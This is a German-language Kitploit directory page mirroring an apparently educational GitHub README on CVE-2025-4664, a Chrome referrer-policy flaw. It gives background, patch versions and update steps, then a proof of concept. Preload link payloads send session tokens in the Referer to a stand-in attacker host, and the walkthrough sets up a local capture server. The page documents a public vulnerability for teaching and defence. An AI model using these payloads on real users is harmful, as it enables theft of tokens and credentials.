Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-4664 | Kitploit
Tools/GitHubGitHub/speinador/cve-2025-4664
SchwachstellenanalyseExploitationInformationsbeschaffungPhishingWebsicherheitLernen & Bildung
GitHubspeinador/cve-2025-4664

CVE-2025-4664

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🔒 Schwachstelle CVE-2025-4664

Die Schwachstelle CVE-2025-4664 ist ein Sicherheitsfehler mit hoher Schwere, der in der Loader-Komponente von Google Chrome in Versionen vor 136.0.7103.113 identifiziert wurde. Dieses Problem ermöglicht es einem entfernten Angreifer, durch eine speziell gestaltete HTML-Seite Daten über Ursprünge hinweg (Cross-Origin) zu exfiltrieren, wodurch sensible Informationen wie Sitzungstokens oder Authentifizierungsdaten kompromittiert werden können.


❓ Worin besteht die Schwachstelle?

Der Fehler liegt in einer unzureichenden Umsetzung der Sicherheitsrichtlinien in der Loader-Komponente von Chrome. Konkret interpretiert Chrome die Direktive referrer-policy im HTTP-Link-Header bei Anforderungen von Unterressourcen (wie Bildern oder Skripten), obwohl andere Browser dies nicht tun. Ein Angreifer kann dies ausnutzen, indem er eine weniger restriktive Richtlinie wie unsafe-url festlegt, was dazu führt, dass Chrome vollständige URLs – einschließlich sensibler Parameter – an vom Angreifer kontrollierte Domains übermittelt.


⚠️ Auswirkungen und aktive Ausnutzung

Diese Schwachstelle wurde in realen Umgebungen aktiv ausgenutzt, weshalb die US-amerikanische Behörde für Cybersicherheit und Infrastruktursicherheit (CISA) sie in ihren Katalog bekannter und ausgenutzter Schwachstellen (KEV) aufgenommen hat. CISA hat den 5. Juni 2025 als Frist festgelegt, bis zu der Bundesbehörden die entsprechenden Korrekturen anwenden müssen.


🛡️ Minderung und Empfehlungen

Google hat Updates zur Behebung dieser Schwachstelle in den folgenden Versionen veröffentlicht:

  • 🖥️ Windows und Mac: 136.0.7103.113/.114
  • 🐧 Linux: 136.0.7103.113

Allen Benutzern wird dringend empfohlen, ihren Chrome-Browser auf die neueste verfügbare Version zu aktualisieren. So überprüfen und installieren Sie das Update:

  1. 🔍 Öffne Chrome und klicke auf das Drei-Punkte-Menü in der oberen rechten Ecke.
  2. ⚙️ Wähle „Hilfe“ und dann „Über Google Chrome“.
  3. ⬇️ Chrome sucht automatisch nach Updates und installiert sie, falls verfügbar.
  4. 🔄 Starte den Browser nach dem Update neu, um die Änderungen zu übernehmen.

Darüber hinaus sollten Nutzer von Chromium-basierten Browsern wie Microsoft Edge, Brave, Opera und Vivaldi die entsprechenden Updates im Auge behalten, da auch sie von dieser Schwachstelle betroffen sein könnten.

Den Browser aktuell zu halten ist unerlässlich, um sich vor aktiven Sicherheitsbedrohungen zu schützen und persönliche Daten zu sichern.


🕵️‍♂️ Wie wird sie ausgenutzt?

Die Schwachstelle CVE-2025-4664 wird ausgenutzt, indem die Art und Weise manipuliert wird, wie Google Chrome die Referrer-Policy (referrer-policy) beim Laden von Unterressourcen (wie Bildern, Skripten usw.) aus HTML-Links handhabt.


⚙️ So wird sie technisch ausgenutzt:

  1. 🌐 Erstellung einer bösartigen Website:
    Der Angreifer erstellt eine Website, die in ihrem HTTP-Header einen HTML-Link wie diesen enthält:

    root@kitploit:~
    <link rel="preload" as="image" href="https://victima.com/imagen.jpg" referrerpolicy="unsafe-url">
    
  2. 🔧 Manipulation der referrer-policy: In den meisten Browsern wird diese referrerpolicy im -Tag nicht auf die geladene Ressource angewendet. Chrome wendet sie jedoch an, was den Kern des Problems darstellt.

  3. 📤 Herausfiltern des Referers: Wenn der Browser des Opfers (Chrome) die Ressource von victima.com lädt, sendet er die gesamte URL der Ursprungsseite als Referer-Header, was Folgendes enthalten kann:

  • Sitzungstokens (?token=ABC123)
  • Sensible Parameter (?user=admin&password=1234)
  • Private URLs
  1. 🎯 Empfang auf dem Server des Angreifers: Der Angreifer kann als Ziel der Ressource eine URL unter seiner Kontrolle festlegen, zum Beispiel:
root@kitploit:~
<link rel="preload" as="image" href="https://atacante.com/captura.jpg" referrerpolicy="unsafe-url">

Wenn das Opfer auf diese Ressource zugreift, sendet Chrome seine vollständige URL als Referer an den Server des Angreifers.

  1. 🕵️ Informationsdiebstahl: Der Server des Angreifers protokolliert die HTTP-Header und erhält den vollständigen Inhalt der URL des Opfers. Dies kann vertrauliche Daten, Zugriffstokens oder sogar URLs interner APIs umfassen.

✔️ Erforderliche Bedingungen für einen erfolgreichen Angriff:

  • 👤 Das Opfer verwendet ein ungepatchtes Google Chrome.
  • 🔑 Die Website des Opfers enthält sensible Informationen in der URL (wie Authentifizierungstokens).
  • 🎣 Der Angreifer bringt den Browser des Opfers dazu, eine Ressource von seiner Domain zu laden (z. B. durch Phishing, eine bösartige Anzeige oder eine Weiterleitung).

🧪 Praktisches Beispiel des Angriffs (vereinfacht):

1- Der Angreifer sendet dem Opfer einen Link zu:

root@kitploit:~
https://atacante.com/pagina-maliciosa.html
  1. Auf dieser Seite wird etwa Folgendes geladen:
root@kitploit:~
<link rel="preload" as="image" href="https://victima.com/perfil?token=ABC123" referrerpolicy="unsafe-url">
  1. Der Chrome-Browser sendet:
root@kitploit:~
Referer: https://victima.com/perfil?token=ABC123

an die Angreifer-Domain und legt so das Token offen.

Profilfoto

Projektdateien

🖥️ index.html — Opferdatei

Diese Datei simuliert das Opfer des Angriffs. Es ist eine vereinfachte HTML-Demo, die zeigt, wie die Schwachstelle CVE-2025-4664 mithilfe eines bösartigen -Tags ausgenutzt werden kann:

  • Stellt die verwundbare Oberfläche dar.
  • Wird verwendet, um zu demonstrieren, wie die Schwachstelle in einer kontrollierten Umgebung funktioniert.
  • Enthält Elemente, die der Angreifer gemäß CVE-2025-4664 ausnutzen kann.
root@kitploit:~
<!DOCTYPE html>
<html lang="es">
<head>
  <meta charset="UTF-8">
  <title>Demo CVE-2025-4664</title>

  <!-- Este recurso apunta a un sitio de la víctima con información sensible en la URL -->
  <link rel="preload" as="image"
        href="https://victima.com/perfil?token=ABC123"
        referrerpolicy="unsafe-url">
</head>
<body>
  <h1>Demostración de la vulnerabilidad CVE-2025-4664</h1>
  <p>Si estás usando una versión vulnerable de Chrome, el navegador enviará el <strong>Referer completo</strong> a la URL de arriba.</p>
</body>
</html>

Was dieser Code bewirkt:

  • Das -Tag ist so konfiguriert, dass es ein Bild von victima.com mit einem Token in der URL vorlädt.
  • Mit referrerpolicy="unsafe-url" sendet Chrome die gesamte URL der aktuellen Seite als Referer an die Opfer-Domain.
  • Ein Angreifer kann diese vollständige URL in seinen Logs erfassen, wenn das Bild auf seinen eigenen Server verweist.

🐍 servidor_atacante.py — Angreiferdatei

Mit diesem Skript lässt sich der Angriff automatisieren, um die Referer mithilfe eines kleinen Python-Servers zu erfassen. Hier ist ein Beispiel mit Flask, um den Server des Angreifers zu simulieren, der die Daten empfängt:

  • Simuliert den Angriff gegen das durch index.html dargestellte Opfer.
  • Implementiert die in der Schwachstelle beschriebenen Techniken.
  • Wird verwendet, um die implementierte Abschwächung zu testen und zu validieren.

So verwendest du es:

  1. Speichere diesen Code als servidor_atacante.py.
  2. Installiere Flask, falls du es nicht hast:
root@kitploit:~
pip install flask
  1. Führe den Server aus:
root@kitploit:~
python servidor_atacante.py
  1. Ändere dann die HTML-Demo wie folgt:
root@kitploit:~
<link rel="preload" as="image"
      href="http://<tu_IP>:8080/captura.jpg"
      referrerpolicy="unsafe-url">

Ersetze <tu_IP> durch die öffentliche oder lokale IP des Servers, auf dem das Skript ausgeführt wird.


💪 So verwendest du das Projekt

🛠️ 1. Flask-Server ausführen

  1. Öffne ein Terminal (PowerShell oder CMD).

  2. Navigiere zum Ordner der Datei:

root@kitploit:~
cd "C:\Users\Sebas\Desktop\servidor_atacante"
  1. Führe Flask aus:
root@kitploit:~
python servidor_atacante.py
  1. Du wirst etwa Folgendes sehen:
root@kitploit:~
* Running on http://127.0.0.1:8080
* Running on http://192.168.1.35:8080

🌐 2. index.html erstellen und öffnen (Opfer simulieren)

Erstelle in demselben Ordner (C:\Users\Sebas\Desktop\servidor_atacante) eine Datei namens index.html mit folgendem Inhalt:

root@kitploit:~
<!DOCTYPE html>
<html lang="es">
<head>
  <meta charset="UTF-8">
  <title>Demo CVE-2025-4664</title>

  <!-- Simula el ataque -->
  <link rel="preload" as="image"
        href="http://192.168.1.35:8080/captura.jpg"
        referrerpolicy="unsafe-url">
</head>
<body>
  <h1>Simulación CVE-2025-4664</h1>
  <p>Este HTML intenta filtrar la URL completa (incluyendo el token) al atacante.</p>
</body>
</html>

✅ Wichtig: Stelle sicher, dass die IP (192.168.1.35) mit der von Flask angezeigten lokalen IP übereinstimmt. Wenn sie anders ist, ändere sie im HTML.

🚀 3. index.html mit sensiblen Parametern öffnen

  1. Öffne Chrome.

  2. Gib in die Adressleiste Folgendes ein:

root@kitploit:~
file:///C:/[Carpeta destino]/servidor_atacante/index.html?token=ABC123
  1. Drücke Enter.

  2. 📥 Ergebnis auf dem Server anzeigen In der Flask-Konsole solltest du etwa Folgendes sehen:

root@kitploit:~
[+] Referer recibido: file:///C:/[Carpeta destino]/servidor_atacante/index.html?token=ABC123

[Zielordner]: Ersetze diesen Parameter durch den Ort, an dem die Datei gespeichert ist.

🎯 Das bedeutet, dass der Browser den vollständigen Referer an den Angreifer gesendet hat!


🧑‍🏫 Autor

Erklärung erstellt von Sebastian Peinador zu Lehr- und Forschungszwecken im Bereich offensiver Cybersicherheit.


📄 Lizenz

Dieses Material wird unter der MIT-Lizenz verbreitet.


Wenn es dir nützlich erscheint, vergiss nicht, dem Repo einen ⭐ zu geben oder es zu teilen!

Tool herunterladen